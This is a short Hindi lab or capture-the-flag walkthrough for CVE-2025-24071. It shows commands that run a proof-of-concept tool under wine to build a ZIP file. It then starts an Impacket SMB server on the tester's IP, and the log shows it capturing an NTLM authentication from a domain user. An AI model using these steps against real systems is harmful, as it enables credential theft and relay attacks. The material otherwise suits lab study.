
CVE-2025-24071 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक विशेष रूप से तैयार की गई ZIP फ़ाइल का उपयोग करके SMB प्रमाणीकरण रिले को ट्रिगर करता है और Impacket के माध्यम से NTLM हैश कैप्चर करता है।
sudo apt update sudo apt install wine
wine CVE-2025-24071-POC.exe -i 10.10.14.8 -n try ZIP बनाया गया: try.zip
impacket-smbserver:
smbserver.py try /root/smbshare -smb2support -ip 10.10.14.8 -debug Impacket (Exegol fork) v0.13.0.dev0+20250723.125503.b5db2dd7 - कॉपीराइट Fortra, LLC और इसकी संबद्ध कंपनियाँ
[+] Impacket लाइब्रेरी स्थापना पथ: /root/.local/share/pipx/venvs/impacket/lib/python3.11/site-packages/impacket [] कॉन्फ़िग फ़ाइल पार्स की गई [] कॉलबैक जोड़ा गया UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 के लिए [] कॉलबैक जोड़ा गया UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 के लिए [] कॉन्फ़िग फ़ाइल पार्स की गई [] कॉन्फ़िग फ़ाइल पार्स की गई [] कॉन्फ़िग फ़ाइल पार्स की गई [] आने वाला कनेक्शन (10.129.232.88,51127) [] AUTHENTICATE_MESSAGE (FLUFFY\p.agila,DC01) [*] उपयोगकर्ता DC01\p.agila सफलतापूर्वक प्रमाणित हुआ